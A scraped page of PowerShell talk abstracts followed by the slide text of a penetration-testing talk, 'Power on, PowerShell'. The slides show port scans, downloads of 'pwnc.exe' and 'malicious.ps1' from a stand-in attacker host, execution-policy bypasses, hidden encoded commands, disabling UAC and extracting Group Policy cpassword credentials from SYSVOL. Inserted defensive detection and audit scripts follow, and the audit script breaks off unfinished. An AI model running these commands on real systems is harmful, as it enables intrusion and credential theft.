This document discusses using PowerShell for penetration testing when standard tools and frameworks may not be usable due to network restrictions or lack of privileges. It provides an introduction to PowerShell and examples of how port scanning, downloading files, and other tasks could be accomplished using PowerShell scripts even in restricted environments. It also covers some of the security mechanisms in PowerShell like execution policies and how they can be bypassed to run unsigned scripts without prompts.
PowerShell for Cyber Warriors - Bsides Knoxville 2016
Russel Van Tuyl
Powershell, the new hotness, is an interactive object-oriented command environment that has revolutionized the ability to interact with the Windows operating systems in a programmatic manner. This environment significantly increases the capabilities of administrators, attackers, defenders, and malware authors alike. This presentation introduces popular PowerShell tools and techniques used by penetration testers and blue team members. Tools range from in-memory only remote administration tools to Active Directory enumeration and from reverse engineering to incident response. Additionally, we will review a couple of pieces of malware that leverage PowerShell and provide information on detecting or defending against previously discussed attacks. If you're a CyberWarrior, this presentation will undoubtedly up your game by equipping you with knowledge on the almighty PowerShell.
Get-Help: An intro to PowerShell and how to Use it for Evil
jaredhaight
This talk covers the basics of how PowerShell works and how to use it. It then goes over a lot of the interesting offensive PowerShell tools that are available and gives a demo of using PowerShell to escalate to Domain Admin privileges on a network.
A video of the talk is available here: https://www.youtube.com/watch?v=YSUJNInriiY
A presentation covering some of the interesting things going on with Powershell in the Infosec community. I give a brief overview of what powershell is, then go over some interesting aspects of three different offensive powershell frameworks and finally give a demo of how a local user can escalate to domain admin privileges using just these frameworks.
This presentation was given at PSConfEU and covers common privilege escalation vectors for Windows systems, as well as how to enumerate these issues with PowerUp.
This presentation was given at DerbyCon 6 on 9/23/2016. It covers the fusion of the PowerShell Empire and Python EmPyre projects, as well as new Empire 2.0 transports.
Incorporating PowerShell into your Arsenal with PS>Attack
jaredhaight
This talk serves as a follow up to my Introducing PS>Attack talk and covers some new features that have been added to the tool as well as how to defend an environment against PowerShell based attacks.
This presentation was given at BSides Austin '15, and is an expanded version of the "I hunt sys admins" Shmoocon firetalk. It covers various ways to hunt for users in Windows domains, including using PowerView.
A follow on to the Encyclopedia Of Windows Privilege Escalation published by InsomniaSec at Ruxcon 2011, this talk is aimed at detailing not just escalation from user to admin and admin to system, but persistence and forced authentication as well as a few other treats.
Introducing PS>Attack: An offensive PowerShell toolkit
jaredhaight
PS>Attack is designed to make it easy for Penetration Testers to incorporate PowerShell into their bag of tricks. It's a custom PowerShell console packed with some of the best offensive tools available. It's designed to be easy to use and opsec safe.
Office 365 & PowerShell - A match made in heaven
Sébastien Levert
In a world where we hear more and more about DevOps and continuous integration, your Office 365 integration process might be lacking some good practices and ways to automate everything. In this session, we will cover how you can use PowerShell to ease the deployment process of your applications, the monitoring of your tenants and the maintenance of all the workloads of Office 365. Being a demo-intensive session, be prepared to see a lot of PowerShell and Office 365 API code!
The 3 key takeaways of this session are:
You will learn how to communicate with the Office 365 API from PowerShell
You will be introduced to DevOps concepts in an Office 365 context
You will be able to reproduce those easy processes without problem back at work
PowerShell Plus is the most advanced Interactive Development Environment for PowerShell available today. Designed to help administrators and developers quickly learn and master Windows PowerShell, it also dramatically increases the productivity of expert users.
PowerShell Plus features a powerful interactive console, an advanced script editor and debugger and a comprehensive interactive learning center all integrated into a single product.
Practical PowerShell Programming for Professional People - Extended Edition
Ben Ten (0xA)
The best hackers are those that can write their own tools or modify existing ones. Regardless of whether you are blue team, red team, purple team, white hat, gray hat, or black hat, PowerShell should be in your repository of tools. While I encourage people to learn other languages as well, PowerShell is a dynamic tool and should not be overlooked. This talk is meant to be an introductory (101) session for PowerShell. I will be giving you a crash course in PowerShell scripting that will equip you to create practical PowerShell scripts for defense, offense, and even some fun things to mess around with people. This talk is designed for anyone who has never done any PowerShell or is just starting to learn. Bring your laptop with PowerShell 3.0 or later, and your favorite text editor (like SublimeText) installed so you can script along with me. You will be able to write a functioning PowerShell script by the end of this talk! Come see the potential power you can unlock by learning PowerShell.
Better, Faster, Stronger! Boost Your Team-Based SharePoint Development Using ...
Richard Calderon
In this session, I discuss and demonstrate how you can use SharePoint 2010 Web Templates and PowerShell scripts to give your team-based SharePoint development process a much needed productivity boost. Using these techniques, you enable your team to quickly test and review their custom components against your complete SharePoint solution while simultaneously eliminating inconsistencies often created by manual configurations.
By the end of this session, you will have learned:
How SharePoint web templates can be used to provision customized SharePoint sites
How to leverage PowerShell scripts to automate your custom site build and feature deployments
The key benefits of this approach for team-based SharePoint development
So stop wasting time and come see how you can help make your SharePoint team development better, faster, and stronger!
Talks about PowerShell UIAutomation used by Y Soft for automating GUI Windows installer testing in multiple languages. How to integrate PowerShell with continuous integration system Jenkins.
Windows - Having Its Ass Kicked by Puppet and PowerShell Since 2012
Puppet
Unix environments have fantastic tooling to eradicate the need for manual server configuration. Windows is completely behind in the use of these tools. PowerShell is now emerging as the tool for Windows admins to manage environments and deployments. Can PowerShell help to bring the DevOps culture to the Windows development world? In this session, I will demonstrate how PowerShell has become a tool necessary to know when working in a Windows environment. The session will demonstrate how development environments can be built in a fraction of the time using Puppet and PowerShell. PowerShell is fast becoming a rockstar of the Windows configuration world. Since Puppet added support for Windows, we can really kick Windows configuration management into submission.
Paul Stack
Principal Software Developer, OpenTable
Paul Stack is a London based developer working on the .NET technology stack. Paul has spoken at various events throughout the world as well as extensively in the UK about his passion for continuous integration and continuous delivery and why they should be part of what developers do on a day to day basis. He believes that reliably delivering software is just as important as its development. Paul's newest passion is the DevOps movement and how this helps not just development and operations but the entire business and its customers.
Geek Sync | Using PowerShell with Python and SQL Server
IDERA Software
You can watch the replay for this Geek Sync webcast in the IDERA Resource Center: http://ow.ly/Mf3H50A5dMC
Just as PowerShell is argued as the main technology for automation in Windows Datacenters Infrastructure, it is equally important in other non-Windows Operating Systems. According to Maximo Trinidad, Windows Administrators have an advantage working with PowerShell just as Linux Administrators have an advantage with Bash / PHP / Python.
Join IDERA and Maximo Trinidad as he walks you through using PowerShell with both SQL Server and Python. This Geek Sync will be interactive and very demo intensive. Questions are encouraged!
About Maximo Trinidad: In Florida, Maximo is known as Mr. PowerShell. He is the founder of the Florida PowerShell User Group which meets on a monthly basis. Maximo is originally from Puerto Rico and has been working in the technology world since 1979. Over the years, he has worked with SQL Server Technologies, provided support to Windows Servers/Client machines, Microsoft Virtualization Technologies, and built some Visual Studio solutions. He has been a Microsoft PowerShell MVP since 2009 and MVP SAPIEN Technologies 2015. He speaks at many of the SQLSaturdays, IT Pro and .NET camps events around Florida.
On February 28th, I delivered a talk at the Romanian PowerShell User Group about discovering hosts and services on the local network in a post-exploitation scenario. Slides and demo code here: https://goo.gl/SQHjj3
Practical PowerShell Programming for Professional People
Ben Ten (0xA)
The best hackers are those that can write their own tools or modify existing ones. Regardless of whether you are blue team, red team, purple team, white hat, gray hat, or black hat, PowerShell should be in your repository of tools. While I encourage people to learn other languages as well, PowerShell is a dynamic tool and should not be overlooked. This talk is meant to be an introductory (101) session for PowerShell. I will be giving you a crash course in PowerShell scripting that will equip you to create practical PowerShell scripts for defense, offense, and even some fun things to mess around with people. This talk is designed for anyone who has never done any PowerShell or just starting to learn. Bring your laptop with PowerShell 3.0 or later, and your favorite text editor (like SublimeText) installed so you can script along with me. You will be able to write a functioning PowerShell script by the end of this talk! Come see the potential power you can unlock by learning PowerShell; and to see how often I can abuse the letter P!
This slideshow outlines 10 reasons why hackers use PowerShell to turn an operating system against itself and compromise entire networks without needing to install a single piece of software.
As organizations assess the security of their information systems, the need for automation has become more and more apparent. Not only are organizations attempting to automate their assessments, the need is becoming more pressing to perform assessments centrally against large numbers of enterprise systems. Penetration testers can use this automation to make their post-exploitation efforts more thorough, repeatable, and efficient. Defenders need to understand the techniques attackers are using once an initial compromise has occurred so they can build defenses to stop the attacks. Microsoft's PowerShell scripting language has become the de facto standard for many organizations looking to perform this level of distributed automation. In this presentation James Tarala, of Enclave Security, will describe to students the enterprise capabilities PowerShell offers and show practical examples of how PowerShell can be used to perform large scale penetration tests of Microsoft Windows systems.
Lateral Movement: How attackers quietly traverse your Network
EC-Council
After successfully attacking an endpoint and gaining a foothold there, sophisticated attackers know that to get to the valuable data within an organization they must quietly pivot. From reconnaissance to escalation of privileges to stealing credentials, learn about the tactics and tools that attackers are using today.
How do you deal with issues that happen in production? Error and Event logs are helpful but often they provide little to no help with things like deadlocks and memory leaks.
In this session we'll explore some low level utilities that allow us to take snapshots of running code and bring it back in house for analysis.
Lions, Tigers and Deers: What building zoos can teach us about securing micro...
Sysdig
How to secure microservices running in containers? Strategies for Docker, Kubernetes, Openshift, RancherOS, DC/OS Mesos.
Privilege, resource and visibility constraints with capabilities, cgroups and namespaces. Image vulnerability scanning and behaviour security monitoring with Sysdig Falco.
RIoT (Raiding Internet of Things) by Jacob Holcomb
Priyanka Aash
The recorded version of 'Best Of The World Webcast Series' [Webinar] where Jacob Holcomb speaks on 'RIoT (Raiding Internet of Things)' is available on CISOPlatform.
Best Of The World Webcast Series are webinars where breakthrough/original security researchers showcase their study, to offer the CISO/security experts the best insights in information security.
For more, sign up (it's free): www.cisoplatform.com
This is about encouraging our audience to follow known good practices: introducing why continuous feature development is essential and why it adds value over following rigid processes.
Ansible: How to Get More Sleep and Require Less Coffee
Sarah Z
Why you need automation, configuration management and remote execution in your life. An intro to Ansible and how it can make your life in Ops infinitely easier.
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
Hackito Ergo Sum
Today most networks present one “gateway” to the whole network – The SSL-VPN. A vector that is often overlooked and considered “secure”, we decided to take apart an industry leading SSL-VPN appliance and analyze it to bits to thoroughly understand how secure it really is. During this talk we will examine the internals of the F5 FirePass SSL-VPN Appliance. We discover that even though many security protections are in-place, the internals of the appliance hides interesting vulnerabilities we can exploit. Through processes ranging from reverse engineering to binary planting, we decrypt the file-system and begin examining the environment. As we go down the rabbit hole, our misconceptions about “security appliances” are revealed.
Using a combination of web vulnerabilities, format string vulnerabilities and a bunch of frustration, we manage to overcome the multiple limitations and protections presented by the appliance to gain a remote unauthenticated root shell. Due to the magnitude of this vulnerability and the potential for impact against dozens of fortune 500 companies, we contacted F5 and received one of the best vendor responses we’ve experienced – EVER!
https://www.hackitoergosum.org
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
Chris Gates
Derbycon 2011
This talk is about methodologies and tools that we use or have coded that make our lives and pentest schedule a little easier, and why we do things the way we do. Of course, there will be a healthy dose of Metasploit in the mix.
JMeter webinar - integration with InfluxDB and Grafana
RTTS
Watch this recorded webinar about real-time monitoring of application performance. See how to integrate Apache JMeter, the open-source leader in performance testing, with InfluxDB, the open-source time-series database, and Grafana, the open-source analytics and visualization application.
In this webinar, we will review the benefits of leveraging InfluxDB and Grafana when executing load tests and demonstrate how these tools are used to visualize performance metrics.
Length: 30 minutes
Session Overview
-------------------------------------------
During this webinar, we will cover the following topics while demonstrating the integrations of JMeter, InfluxDB and Grafana:
- What out-of-the-box solutions are available for real-time monitoring JMeter tests?
- What are the benefits of integrating InfluxDB and Grafana into the load testing stack?
- Which features are provided by Grafana?
- Demonstration of InfluxDB and Grafana using a practice web application
To view the webinar recording, go to:
https://www.rttsweb.com/jmeter-integration-webinar
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
UiPath Test Automation using UiPath Test Suite series, part 3
DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 3. In this session, we will cover desktop automation along with UI automation.
Topics covered:
UI automation Introduction,
UI automation Sample
Desktop automation flow
Pradeep Chinnala, Senior Consultant Automation Developer @WonderBotz and UiPath MVP
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
UiPath Test Automation using UiPath Test Suite series, part 4
DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques.
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
PHP Frameworks: I want to break free (IPC Berlin 2024)
Ralf Eggert
In this presentation, we examine the challenges and limitations of relying too heavily on PHP frameworks in web development. We discuss the history of PHP and its frameworks to understand how this dependence has evolved. The focus will be on providing concrete tips and strategies to reduce reliance on these frameworks, based on real-world examples and practical considerations. The goal is to equip developers with the skills and knowledge to create more flexible and future-proof web applications. We'll explore the importance of maintaining autonomy in a rapidly changing tech landscape and how to make informed decisions in PHP development.
This talk is aimed at encouraging a more independent approach to using PHP frameworks, moving towards a more flexible and future-proof approach to PHP development.
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
Let's dive deeper into the world of ODC! Ricardo Alves (OutSystems) will join us to tell all about the new Data Fabric. After that, Sezen de Bruijn (OutSystems) will get into the details on how to best design a sturdy architecture within ODC.
Accelerate your Kubernetes clusters with Varnish Caching
Thijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
Connector Corner: Automate dynamic content and events by pushing a button
DianaGray10
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
Prayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Inflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
Power on, Powershell
1. Power on, PowerShell
Using PowerShell to do the nasty
Nikhil Sreekumar
roo7break@gmail.com
@roo7break
www.roo7break.co.uk
2. The plug
• Nikhil Sreekumar
– Senior Penetration Tester @ 7Safe
– Over three years as penetration tester
• CREST ACE certified
– Also delivers 7Safe’s courses
• CSTP – Certified Security Testing Professional
• CAST – Certified Application Security Tester (advanced)
– Previous roles
• Breach Forensic Investigator
• IT Consultant
– Loves Python; Mixed feelings for Ruby; Hates Perl
3. Intro
• Normal penetration testing revolves a lot around network based attacks using
– Attack frameworks (toolkits)
• Social engineering toolkit
• Metasploit
• Core Impact
– Exploit sources
• Exploit-db.com
• 1337day.com
• Exploit -> Get a shell -> Exploit more -> Get domain admin -> Report -> Go out for a beer
4. But, what if
• You have access to a system, but
– No outbound connection*
– You are in a restricted environment (e.g. Citrix)
– Current user privileges are very restricted
– Payloads/tools detected by Anti-Virus/HIDS
* Open traffic is blocked
5. Time for a rethink
• Cannot rely on any open source exploitation
framework
– AV vendors are WATCHING!
– System/Network admins are getting smarter and
cleverer
– Organisations are investing in security
• Maybe it's time to think of an alternate solution.
– Why not look into bending existing technology to do
our bidding?
7. Welcome to PowerShell
• Unix bash-like shell in Windows
– Way more powerful than CMD
• Available from Vista upwards
– Can be disabled from Server 2008; however, it's not
that easy in Windows 7
• Allows you to
– Manage registry, services, processes, event logs
and Windows Management Instrumentation (WMI)
– Task based scripting language
– Powerful object manipulation capabilities
– Simplified and consistent design
• Full integration with
– Existing Microsoft products like Exchange, AD, etc.
– Can be directly called from .NET framework
[Microsoft Technet] - http://technet.microsoft.com/en-gb/library/bb978526.aspx
9. Scripting PowerShell
• Use of CmdLets
– Lightweight command; used in PowerShell
environment.
– Typically a .NET framework class
– Invoked within the context of automation scripts
provided at the command line.
– Also invoked programmatically through Windows
PowerShell APIs.
10. Scripting PowerShell
• Basic CmdLets
CmdLet          PowerShell alias     CMD.exe         *nix environment
Get-Help        man, help            help            man
Get-Content     cat, gc, type        type            cat
Move-Item       move, mv, mi         move            mv
Copy-Item       cp, copy, cpi        copy            cp
Select-String   NONE                 find, findstr   grep
Source: http://pen-testing.sans.org/blog/2012/04/27/presentation-powershell-for-pen-testers
11. Scripting PowerShell
• Basic CmdLets (contd.)
– Where-Object (alias ?)
• Filter objects passed down via pipe (|)
Get-Service | ? {$_.Status -eq "Running"}
Get-Process | ? { $_.Modules -like "*(rsaenh.dll)*" -and $_.Modules -like "*(iphlpapi.dll)*" -and $_.Modules -like "*(WININET.dll)*" }
– ForEach-Object (alias %)
• Not to be confused with the loop statement, foreach
• Action to be performed on each object passed down via pipe (|)
Get-ChildItem | ForEach-Object {echo $_.Name}
Same as dir :D
– Get-Member (alias gm)
• Lists the members (properties and methods) of the objects passed down the pipe, which you can use to filter your query with ? and %
Get-ChildItem | gm
• For more info, refer:
– http://www.powershellpro.com/powershell-tutorial-introduction/tutorial-powershell-cmdlet/
– http://technet.microsoft.com/en-us/scriptcenter/dd772285.aspx
12. How to script using PowerShell
• Using the PowerShell shell
– Run powershell.exe to start
• Echo commands into a file; save it as .ps1
– .ps1 files are automatically recognised as
PowerShell scripts
– Can be manipulated using the built-in PowerShell
Integrated Scripting Environment (ISE) – IDE for
PowerShell
13. Sample uses for PT
• Port Scanning
1..1024 | ForEach-Object {
  echo ((New-Object Net.Sockets.TcpClient).Connect("<TargetIP>",$_)) "Port $_ is open"
} 2>$null
Port 80 is open
• You could modify the script above to send a string
to the remote host for egress checking
14. Sample uses for PT
• Port Sweep
– Scan the range for all IPs with port 8080 open
1..255 | ForEach-Object {
  echo ((New-Object Net.Sockets.TcpClient).Connect("10.1.1.$_",8080)) "10.1.1.$($_):8080 is open"
} 2>$null
10.1.1.100:8080 is open
15. Sample uses for PT
• Downloading stuff
– Binaries
(New-Object System.Net.WebClient).DownloadFile("http://hackersite.com/pwnc.exe","c:\pwnc.exe")
– Text file from stdout to a local file
(New-Object System.Net.WebClient).DownloadString("http://hackersite.com/malicious.ps1") | Out-File -Encoding ASCII securescript.ps1
16. Hold on tiger
• Did you really think it's going to be that easy??
– PowerShell isn't going to let you run any script
without having a say.
• It tries to enforce "security" using something
called Execution Policy.
– Get-ExecutionPolicy
• Will give you the current policy status
17. The Security
• Execution Policies:
– Restricted
• Default policy
• Only individual commands; no scripts
– AllSigned
• Allows scripts execution
• Needs to be signed by trusted publisher
• Prompts if run with scripts from untrusted publishers
– RemoteSigned
• Allows scripts execution
• Scripts downloaded from the Internet must be signed by a trusted
publisher
• Signing not required for local scripts
18. The Security (contd.)
– Unrestricted
• Allows unsigned script execution
• Prompts warning before execution
– Bypass
• Nothing is blocked; no warnings or prompts
• To be used when PowerShell is used within a larger app
– Undefined
• No specific policy is set in the current scope
– If nothing is specified, default policy is applied = Restricted.
• For more information, RTFM
20. Before we move on
• UAC (User Account Control)
– Is a pain in the a**
• Most of the attacks described may/may not interfere with UAC.
• At this point in time, we cannot bypass UAC. Or can we?
– Will take this up at a later stage.
To check the UAC level
$(Get-ItemProperty -Path registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA).EnableLUA
If the value is "1", then UAC is ON.
• To disable UAC
Set-ItemProperty -Path HKLM:\Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -Value 0
However, we need local admin rights
And a system reboot for this change to take effect
21. Think like a hacker
• These policies can be bypassed
• Technique #1
Change the default policy to RemoteSigned
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
– However, we need admin privileges to do this
– You don't want to 'accidentally' set the policy for all
users
22. Think like a hacker
• Technique #2
Pass the command
powershell -command dir
• Executes the specified commands (and any parameters) as though
they were typed at the PowerShell command prompt
[Powershell Help]
23. Think like a hacker
• Technique #2 (contd.)
Pass the command
powershell -command "(New-Object System.Net.WebClient).DownloadFile('http://hackersite.com/pwnc.exe','c:\pwnc.exe')"
powershell -command "Invoke-Expression (gc .\script.ps1)"
• Need a one-liner?
gc .\script.ps1 | iex
24. Think like a hacker
• Technique #3
CreateCMD
• Run a script without actually running a script
– execute the script contents in the current shell context with all new
functions that are in the script
• Uses “-EncodedCommand”
– Accepts Base64 version of the command
• Checkout Dave Kennedy (ReL1K) and Josh Kelly (winfang) Defcon 18
talk
– PowerShell.. OMFG
• Impact
– Policy does not matter
– No need to disable execution policies
– No registry interaction, no reboots, etc.
25. Think like a hacker
• Technique #3 (contd.)
– Write your script (.ps1) on one long line.
– All {}s should be on the same line; use ; to terminate
each command.
$command = Get-Content .\script.ps1
$encodedcmd = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($command))
powershell.exe -EncodedCommand $encodedcmd
26. Think like a hacker
• Technique #4
• This technique will
– try and bypass the execution policy
– execute the script in the background
• Can be used once you have a way into a system
– E.g. shell
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File <script_name>
Source: http://obscuresecurity.blogspot.co.uk/2011/08/powershell-executionpolicy.html
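Added example, not from the talk: the defender's view of Techniques #3 and #4. It triages logged powershell.exe command lines for the switches shown above and decodes any -EncodedCommand payload; the sample lines, the script path and the use of Security 4688 / Sysmon Event ID 1 as the log source are assumptions.

```powershell
# Added example, not from the talk: triage logged powershell.exe command lines for the
# switches used in Techniques #3 and #4 and decode any -EncodedCommand payload so an
# analyst can read what actually ran. Input normally comes from process-creation events
# (Security 4688 with command-line auditing, or Sysmon Event ID 1); the lines below are
# constructed for the demonstration.

function Get-PowerShellCommandLineIndicators {
    param([Parameter(Mandatory)][string]$CommandLine)

    # powershell.exe accepts any unambiguous prefix of a switch (-ep, -w, -nop, -noni,
    # -e/-ec/-enc), so the patterns match on prefixes, case-insensitively.
    $checks = [ordered]@{
        'ExecutionPolicy Bypass' = '(?i)-(?:ep|ex\w*)\s+bypass'
        'WindowStyle Hidden'     = '(?i)-w\w*\s+hidden'
        'NonInteractive'         = '(?i)-noni\w*'
        'NoProfile'              = '(?i)-nop\w*'
        'EncodedCommand'         = '(?i)-e(?:c|n\w*)?\s+[A-Za-z0-9+/=]+'
    }
    $indicators = @($checks.Keys | Where-Object { $CommandLine -match $checks[$_] })

    # Decode the Base64(UTF-16LE) payload; malformed Base64 is reported, not thrown.
    $decoded = $null
    if ($CommandLine -match '(?i)-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]+)') {
        try { $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
        catch { $decoded = '<malformed Base64>' }
    }

    [pscustomobject]@{
        CommandLine    = $CommandLine
        Indicators     = $indicators
        DecodedCommand = $decoded
    }
}

# Constructed sample lines; the encoded one is built exactly as the slides build it,
# from a harmless command.
$sampleEncoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('Get-Date'))
$sampleLines = @(
    'powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File C:\Users\Public\script.ps1',
    "powershell -nop -w hidden -enc $sampleEncoded",
    'powershell.exe -NoProfile -Command Get-Service'
)
# -NoProfile alone is routine; two or more indicators together are worth a look.
$sampleLines | ForEach-Object { Get-PowerShellCommandLineIndicators -CommandLine $_ } |
    Where-Object { $_.Indicators.Count -ge 2 } |
    Format-List CommandLine, Indicators, DecodedCommand
```

The first two sample lines are reported (four and three indicators), the plain -NoProfile line is not; the decoded payload of the second line reads Get-Date.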
27. Post Exploitation the
PowerShell way
Exploiting Windows 2008 Group Policy Preferences
• Group Policy preferences, new for the Windows Server 2008
operating system, include more than 20 new Group Policy
extensions that expand the range of configurable settings
within a Group Policy object (GPO) [http://technet.microsoft.com/en-us/library/cc731892%28WS.10%29.aspx]
• Helps setting local admin password for workstations and
servers
– Adding new users on local machines, etc.
– Via Local User and Groups Extension
28. Post Exploitation the
PowerShell way
Exploiting Windows 2008 Group Policy Preferences
(contd.)
• Unknown to the general public (and many system admins),
Windows was storing the encrypted admin passwords in
XML files accessible to normal users
• Location:
– \\server\sysvol\domain\Policies\{Hash}\MACHINE\Preferences\Groups\Groups.xml
29. Post Exploitation the
PowerShell way
Exploiting Windows 2008 Group Policy Preferences
(contd.)
30. Post Exploitation the
PowerShell way
Exploiting Windows 2008 Group Policy Preferences
(contd.)
• Encryption
– AES = Strong
• It would take years to decrypt that password. Only if someone
could help me..
• Why not ask Microsoft?
31. Post Exploitation the
PowerShell way
http://msdn.microsoft.com/en-us/library/cc422924.aspx
32. Post Exploitation the
PowerShell way
• Let's use PowerShell to extract these
passwords
– Connect to the domain controller as a normal user
$output = Get-ChildItem \\server\sysvol\domain\Policies -Filter *.xml -Recurse | Get-Content
[regex]::Match($output,'cpassword="(?<pwd>.+?)"') | ForEach-Object {$_.Groups["pwd"].Value}
33. Post Exploitation the
PowerShell way
• Are there any more locations?
• Oh yeah!
– Services\Services.xml
– ScheduledTasks\ScheduledTasks.xml
– Printers\Printers.xml
– Drives\Drives.xml
– DataSources\DataSources.xml
• Source:
http://rewtdance.blogspot.co.uk/2012/06/exploiting-windows-2008-group-policy.html
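Added example, not from the talk: the audit a sysadmin would run against the extraction shown on the previous slides and the extra locations listed here. It reports every preference file under a Policies share that still carries a cpassword attribute, without printing the value; the share path, the sample tree and the placeholder GPO GUID are assumptions.

```powershell
# Added example, not from the talk: a defender-side audit that walks a Policies share for
# Group Policy Preference XML files carrying a cpassword attribute and reports which file
# and account each belongs to, so the preference can be removed and the password rotated.
# Point it at the real share (\\server\sysvol\domain\Policies, an assumed path); here it
# runs over a constructed sample tree in the temp directory.

function Find-GppCpassword {
    param([Parameter(Mandatory)][string]$PoliciesPath)

    Get-ChildItem -Path $PoliciesPath -Filter *.xml -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            try { [xml]$doc = Get-Content -Path $file.FullName -Raw -ErrorAction Stop }
            catch { Write-Warning "Skipping unparseable XML: $($file.FullName)"; return }

            # Match on the attribute rather than the file name, so every preference type
            # the talk lists (Groups, Services, ScheduledTasks, Printers, Drives,
            # DataSources) is covered by one query.
            foreach ($node in $doc.SelectNodes('//*[@cpassword]')) {
                # The account attribute name differs per preference type.
                $account = foreach ($a in 'userName', 'accountName', 'runAs', 'username') {
                    if ($node.HasAttribute($a)) { $node.GetAttribute($a); break }
                }
                [pscustomobject]@{
                    File       = $file.FullName
                    Preference = $node.ParentNode.LocalName
                    Account    = $account
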